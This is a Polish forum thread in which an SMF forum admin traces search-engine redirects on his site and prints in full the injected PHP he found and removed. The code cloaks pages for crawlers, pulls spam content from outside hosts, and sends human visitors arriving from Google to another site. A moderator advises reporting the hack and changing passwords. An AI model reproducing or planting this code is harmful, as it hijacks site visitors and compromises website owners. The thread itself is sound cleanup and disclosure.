SMF 2.0.15 - przekierowanie z linków google

  • 2 Odpowiedzi
  • 376 Wyświetleń

0 użytkowników i 1 Gość przegląda ten wątek.

*

Offline Swoop

  • ***
  • 29
  • 0
  • Płeć: Mężczyzna
  • Wersja SMF: 2.0.7
SMF 2.0.15 - przekierowanie z linków google
« dnia: 17 Lipiec 2019, 23:16 »
Witam wszystkich,
No i mam problem: w momencie wejścia na stronę normalnie (wpisując choćby adres w przeglądarce) wszystko jest ok, jednak jeśli wyszukasz jakąś frazę w google, odpala się wspomniana strona z forum aby następnie przekierować na inną stronę.
W kodzie wyświetlanej strony znalazłem coś takiego:
<script type="text/javascript"> setTimeout('location.replace("http://mytdsitezgo.tk/showthread2.php?p=slv1")', 2000); </script>
Niestety nie udało mi się tego znaleźć w żadnym pliku.
Proszę o pomoc, bo już nie mam pomysłów

Pomoc (google): https://www.google.com/search?client=firefox-b-d&channel=trow&q=jaki+olej+do+toyoty
Link bezpośredni: http://forum.toyotaklub.org.pl/index.php?topic=25942.195

Przy czym to przekierowanie nie zawsze działa, jak się wejdzie na forum to kolejne przekierowanie będzie po ... kilku minutach

*

Offline Swoop

  • ***
  • 29
  • 0
  • Płeć: Mężczyzna
  • Wersja SMF: 2.0.7
Odp: SMF 2.0.15 - przekierowanie z linków google
« Odpowiedź #1 dnia: 17 Lipiec 2019, 23:31 »
Dla potomnych, bo chyba właśnie rozwiązałem problem.
Jeśli ktoś będzie miał taką sytuację a dodatkowo w katalogach (nie we wszystkich) znajdzie katalog: "engl" to ..
  • wszystkie te katalogi "engl" do usunięcia
  • W indexie w głównym katalogu, jak również w podkatalogach, poszukać i usunąć kod:
<?php
if(!defined(&#39;_NET&#39;))
{    
error_reporting(0);
$NET=&#39;sh19045&#39;; 
define(&#39;_NET&#39;,$NET);
if(function_exists(&#39;date_default_timezone_set&#39;)){date_default_timezone_set(&#39;America/Los_Angeles&#39;);}$sll0=&#39;http://googlecountwebs.com/&#39;;$pinj_0=&#39;http://tds-err.com/i?r=1&#39;;$pinj_1=&#39;http://tds-narod.ru/i.txt&#39;;$FNN=&#39;lnk-trans2.php&#39;;$pinj_2=&#39;yahoo&#39;;$pinj_2=&#39;bing&#39;;$pinj_3=str_replace(&#39;google&#39;,$pinj_1,$sll0);$pinj_4=&#39;site&#39;;$sll0=str_replace(&#39;google&#39;,$pinj_4,$sll0);$pinj_5=&#39;&#39;;$pinj_6=&#39;&#39;;$pinj_7=&#39;&#39;;$pinj_8=&#39;&#39;;if(!empty($_SERVER[&#39;HTTP_USER_AGENT&#39;])){$pinj_6=$_SERVER[&#39;HTTP_USER_AGENT&#39;];}if(!empty($_SERVER[&#39;HTTP_REFERER&#39;])){$pinj_5=$_SERVER[&#39;HTTP_REFERER&#39;];}if(!empty($_SERVER[&#39;REQUEST_URI&#39;])){$pinj_7=$_SERVER[&#39;REQUEST_URI&#39;];}if(!empty($_SERVER[&#39;REMOTE_ADDR&#39;])){$pinj_8=$_SERVER[&#39;REMOTE_ADDR&#39;];}if(!function_exists(&#39;get_cont&#39;)){function get_cont($pinj_9){if(function_exists(&#39;curl_init&#39;)){$pinj_10=curl_init();curl_setopt($pinj_10,CURLOPT_URL,$pinj_9);curl_setopt($pinj_10,CURLOPT_HEADER,0);curl_setopt($pinj_10,CURLOPT_NOBODY,0);curl_setopt($pinj_10,CURLOPT_TIMEOUT,35);curl_setopt($pinj_10,CURLOPT_RETURNTRANSFER,1);curl_setopt($pinj_10,CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)");$pinj_11=curl_exec($pinj_10);curl_close($pinj_10);return $pinj_11;}$pinj_12=@file_get_contents($pinj_9);return $pinj_12;}}if(!function_exists(&#39;SEbot_&#39;)){function SEbot_($pinj_13){if(strpos(&#39;-&#39; .strtolower($pinj_13),&#39;googlebot&#39;,0)>0){return 1;}if(strpos(&#39;-&#39; .strtolower($pinj_13),&#39;slurp&#39;,0)>0){return 1;}if(strpos(&#39;-&#39; .strtolower($pinj_13),&#39;bing&#39;,0)>0){return 1;}if(strpos(&#39;-&#39; .strtolower($pinj_13),&#39;msnbot&#39;,0)>0){return 1;}if(strpos(&#39;-&#39; .strtolower($pinj_13),&#39;yahoo&#39;,0)>0){return 1;}return 0;}}if(!function_exists(&#39;not_do_&#39;)){function not_do_($pinj_14){$pinj_15=&#39;gif|jpeg|png|js|css|swf|ico|txt|pdf|xml|jpg|pdf|doc&#39;;$pinj_16=explode("|",$pinj_15);$pinj_17=0;while($pinj_17<count($pinj_18)){if(strpos(&#39; &#39; .strtolower($pinj_14),$pinj_18[$pinj_17],0)>0)return 1;$pinj_17=$pinj_17+1;}return 0;}}if(!function_exists(&#39;detect_encoding_&#39;)){function detect_encoding_($pinj_19){static $pinj_20=array(&#39;UTF-8&#39;,&#39;ASCII&#39;,&#39;Windows-1251&#39;,&#39;ISO-8859-2&#39;,&#39;ISO-8859-3&#39;,&#39;ISO-8859-4&#39;,&#39;ISO-8859-5&#39;,&#39;ISO-8859-6&#39;,&#39;ISO-8859-7&#39;,&#39;ISO-8859-8&#39;,&#39;ISO-8859-9&#39;,&#39;ISO-8859-10&#39;,&#39;ISO-8859-13&#39;,&#39;ISO-8859-14&#39;,&#39;ISO-8859-15&#39;,&#39;ISO-8859-16&#39;,&#39;ISO-8859-1&#39;,&#39;Windows-1252&#39;,&#39;Windows-1254&#39;,);foreach($pinj_20 as $pinj_21){$pinj_22=@iconv($pinj_21,$pinj_21 .&#39;&#39;,$pinj_19);if(md5($pinj_22)== md5($pinj_19))return $pinj_21;}return null;}}if(isset($_SERVER[&#39;HTTPS&#39;])&&($_SERVER[&#39;HTTPS&#39;]==&#39;on&#39;)){$pinj_23=&#39;https&#39;;}else{$pinj_23=&#39;http&#39;;}$pinj_24=substr(str_replace(&#39;www.&#39;,&#39;&#39;,$_SERVER[&#39;SERVER_NAME&#39;]),0,4);if((SEbot_($pinj_6)>0)&&empty($pinj_25)&&(not_do_($pinj_7)==0)){$pinj_26=get_cont($sll0 .$FNN .&#39;?d=&#39; .$_SERVER[&#39;SERVER_NAME&#39;] .&#39;&NET=&#39; .$NET .&#39;&u=&#39; .urlencode($pinj_7) .&#39;&prot=&#39; .$pinj_23);$pinj_25=get_cont($pinj_23 .&#39;://&#39; .$_SERVER[&#39;SERVER_NAME&#39;] .$pinj_7);if(strlen($pinj_25)>200){if(strpos($pinj_26,&#39;"ttl"&#39;,0)>0){$pinj_27=@unserialize($pinj_26);$pinj_28="\r\n" .&#39;<meta name="description" content="&#39; .$pinj_27[&#39;dsc&#39;] .&#39;"/>&#39; ."\r\n";$pinj_29=array("&#39;<li>.*?</li>&#39;si","&#39;<li [^>]*?>
.*?</li>'si");$pinj_30=array("","");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_25);$pinj_29=array("'<noscript[^>]*?>.*?</noscript>'si");$pinj_30=array("");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_31);$pinj_31=str_replace('></a>','> </a>',$pinj_31);$pinj_31=preg_replace('/<a(.+?)href=("|\')(.+?)("|\')(.*?)>(.+?)<\/a>/i',"",$pinj_31);$pinj_31=str_replace("</li>",'',$pinj_31);$pinj_31=str_replace("<ul>",'',$pinj_31);$pinj_31=str_replace("</ul>",'',$pinj_31);$pinj_29=array("'<h1 [^>]*?>.*?</h1>'si","'<h2 [^>]*?>.*?</h2>'si","'<h2>.*?</h2>'si","'<iframe [^>]*?>.*?</iframe>'si","'<h3[^>]*?>.*?</h3>'si","'<h4[^>]*?>.*?</h4>'si","'<h5[^>]*?>.*?</h5>'si");$pinj_30=array("","","","","","","");$pinj_31=preg_replace($pinj_29,$pinj_30,$pinj_31);$pinj_32=0;$pinj_33=@explode('>',$pinj_31);$pinj_17=0;$pinj_34='';$pinj_35='';$pinj_36='';$pinj_37='';$pinj_38=0;$pinj_39=0;$pinj_40=0;if(strpos('-' .strtolower($pinj_31),'<body',0)<=0){$pinj_41=1;}else{$pinj_41=0;}while($pinj_17<count($pinj_33)){if((strpos('-' .strtolower($pinj_33[$pinj_17]),'<body',0)>0)&&($pinj_41==0)){$pinj_41=1;}$pinj_42=explode('<',$pinj_33[$pinj_17]);$pinj_42[0]=trim($pinj_42[0]);if((strlen($pinj_42[0])>40)){if((strpos($pinj_42[0],'=',0)<=0)&&(strpos($pinj_42[0],'}',0)<=0)&&(strpos($pinj_42[0],'{',0)<=0)&&(strpos($pinj_42[0],'+',0)<=0)&&(strpos($pinj_42[0],');',0)<=0)&&(!preg_match("/\.[a-zA-Z]/i",$pinj_42[0]))){if((strlen($pinj_35)<strlen($pinj_42[0]))&&(strlen($pinj_35)<80)&&($pinj_41==1)){$pinj_35=$pinj_42[0];$pinj_38=$pinj_17;}elseif((strlen($pinj_36)<strlen($pinj_42[0]))&&($pinj_41==1)){$pinj_36=$pinj_42[0];$pinj_39=$pinj_17;}elseif((strlen($pinj_37)<strlen($pinj_42[0]))&&($pinj_41==1)){$pinj_37=$pinj_42[0];$pinj_40=$pinj_17;}}}$pinj_17=$pinj_17+1;}$pinj_43="<h1>" .$pinj_27['h1'] ."</h1> \r\n " .$pinj_27['txt1'] ."";$pinj_44=$pinj_27['txt2'];$pinj_45=$pinj_27['txt3'];if($pinj_40==0){$pinj_44=$pinj_44 .' ' .$pinj_45;$pinj_45='';}if($pinj_39==0){$pinj_43=$pinj_43 .' ' .$pinj_44;$pinj_44='';}$pinj_46='';if($pinj_38==0){$pinj_46=$pinj_43;}$pinj_17=0;while($pinj_17<count($pinj_33)){$pinj_42=@explode('<',$pinj_33[$pinj_17]);$pinj_42[0]=trim($pinj_42[0]);if((strlen($pinj_42[0])>40)){if((strpos($pinj_42[0],'=',0)<=0)&&(strpos($pinj_42[0],'}',0)<=0)&&(strpos($pinj_42[0],'{',0)<=0)&&(strpos($pinj_42[0],'+',0)<=0)&&(strpos($pinj_42[0],');',0)<=0)&&(!preg_match("/\.[a-zA-Z]/i",$pinj_42[0]))){if(($pinj_17==$pinj_40)){$pinj_42[0]='-vst3-';}elseif($pinj_17==$pinj_39){$pinj_42[0]='-vst2-';}elseif($pinj_17==$pinj_38){$pinj_42[0]='-vst1-';}else{$pinj_42[0]='';}}}$pinj_33[$pinj_17]=@implode('<',$pinj_42);if(isset($pinj_47)){echo $pinj_33[$pinj_17];exit;}if($pinj_34==''){$pinj_34=$pinj_33[$pinj_17];}else{if((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'keywords',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'description',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'meta',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'title',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'property',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'og:',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'link',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'alternate',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'link',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'canonical',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'rel=',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'alternate',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'rel=',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'contents',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'charset=',0)>0)){}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'<title',0)>0)&&(strpos(strtolower('-' .$pinj_33[$pinj_17]),'</title',0)<=0)){$pinj_34=$pinj_34 .'> ' .$pinj_28 ."\r\n" .' <title>' .$pinj_27['ttl'] .'</title';$pinj_48=2;}elseif((strpos(strtolower('-' .$pinj_33[$pinj_17]),'<body',0)>0)){$pinj_34=$pinj_34 .'>' .$pinj_33[$pinj_17] .'> ' .$pinj_46;$pinj_48=1;}else{if(isset($pinj_48)&&($pinj_48==1)){$pinj_34=$pinj_34 .'' .$pinj_33[$pinj_17];$pinj_48=0;}elseif(isset($pinj_48)&&($pinj_48==2)){$pinj_34=$pinj_34 .'';$pinj_48=0;}else{$pinj_34=$pinj_34 .'>' .$pinj_33[$pinj_17];}}}$pinj_17=$pinj_17+1;}$pinj_34=str_replace(array('-vst1-','-vst2-','-vst3-'),array($pinj_43,$pinj_44,$pinj_45),$pinj_34);$pinj_34=str_replace("</head>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace("</HEAD>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace("</Head>",'<meta charset="utf-8"> </head>',$pinj_34);$pinj_34=str_replace('< <','<',$pinj_34);$pinj_34=str_replace('<?<','<',$pinj_34);$pinj_34=str_replace('<<','<',$pinj_34);$pinj_34=str_replace("<\n",'',$pinj_34);$pinj_34=preg_replace("/\d{2}\.\d{2}.\d{4}/","",$pinj_34);$pinj_34=preg_replace("/\d{2}\-\d{2}-\d{4}/","",$pinj_34);$pinj_34=preg_replace("/\d{1}\.\d{2}.\d{4}/","",$pinj_34);$pinj_34=preg_replace("/\d{4}\.\d{2}.\d{2}/","",$pinj_34);$pinj_34=preg_replace("/\d{4}\-\d{2}-\d{2}/","",$pinj_34);$pinj_34=preg_replace('/\n\n+/',"\n",$pinj_34);$pinj_34=preg_replace('/\r\n\r\n+/',"\r\n",$pinj_34);$pinj_34=preg_replace('/    \n    \n+/',"\n",$pinj_34);$pinj_34=str_replace("2010",date('Y'),$pinj_34);$pinj_34=str_replace("2011",date('Y'),$pinj_34);$pinj_34=str_replace("2012",date('Y'),$pinj_34);$pinj_34=str_replace("2013",date('Y'),$pinj_34);$pinj_34=str_replace("2014",date('Y'),$pinj_34);$pinj_34=str_replace("2015",date('Y'),$pinj_34);$pinj_34=str_replace("2016",date('Y'),$pinj_34);$pinj_34=str_replace("2017",date('Y'),$pinj_34);$pinj_49='"ab","az","ay","sq","en","en-us","ar","hy","as","af","ba","be","bn","bg","br","cy","hu","vi","gl","nl","el","ka","gn","da","zu","iw","ji","in","ia","ga","is","es","it","kk","km","ca","ks","qu","ky","zh","ko","co","ku","lo","lv","la","lt","mg","ms","mt","mi","mk","mo","mn","na","de","ne","no","pa","fa","pl","pt","ps","rm","ro","ru","sm","sa","sr","sk","sl","so","sw","su","tl","tg","th","ta","tt","bo","to","tr","tk","uz","uk","ur","fj","fi","fr","fy","ha","hi","hr","cs","sv","eo","et","jw","ja"';$pinj_50=explode(',',$pinj_49);$pinj_34=str_replace($pinj_50,'"' .$pinj_27['lang'] .'"',$pinj_34);echo $pinj_34;exit;}$pinj_51=$pinj_25;$pinj_52=strpos(strtolower($pinj_25),"<body",0);$pinj_53=strpos(strtolower($pinj_25),">",$pinj_52);if(($pinj_52>0)&&($pinj_53>0)){$pinj_25=substr($pinj_51,0,$pinj_53+1) .$pinj_26 .'' .substr($pinj_51,$pinj_53+1);if(strpos(strtolower('-' .$pinj_6),'sape',0)>0){$pinj_25=$pinj_25 .'=*OK*=';}echo $pinj_25;exit;}}}if(isset($pinj_5)&&((strpos($pinj_5,'ogle.',0)>0)||(strpos($pinj_5,'ing.',0)>0)||(strpos($pinj_5,'ahoo.',0)>0))){$pinj_54='mkke';$pinj_55=70;if(!isset($_COOKIE[$pinj_54])||($_COOKIE[$pinj_54]<(time()))){$pinj_56=get_cont($sll0 .$FNN .'?rd=1&d=' .$_SERVER['SERVER_NAME'] .'&NET=' .$NET .'&u=' .urlencode($pinj_7) .'&prot=' .$pinj_23);if(strlen($pinj_56,'<!-- -->',0)>0)$pinj_55=30000;if(strlen($pinj_56)>10){$pinj_57=get_cont($pinj_23 .'://' .$_SERVER['SERVER_NAME'] .$pinj_7);if(strlen($pinj_57)>400){$pinj_56=str_replace('-SID-',$NET,$pinj_56);$pinj_57=str_replace('</head>',$pinj_56 .'</head>',$pinj_57);setcookie($pinj_54,(time()+$pinj_55),(time()+$pinj_55*2),'/','.' .str_replace('www.','',$_SERVER['SERVER_NAME']));echo $pinj_57;exit;}}}}
}
/*,.*/
?>

*

Offline Adrian

  • *****
  • 5567
  • 727
  • Płeć: Mężczyzna
  • Smile, tomorrow will be worse...
    • Adrek.pl
  • Wersja SMF: 2.0.17
Odp: SMF 2.0.15 - przekierowanie z linków google
« Odpowiedź #2 dnia: 18 Lipiec 2019, 19:27 »
Polecam zgłosić sprawę do hostingu oraz zmienić hasła dostępowe do bazy danych oraz FTP, kod nie pochodzi z SMF, najprawdopodobniej ktoś go dodał uzyskując nielegalnie dostęp do plików na serwerze.
the simplest solution is most likely the right one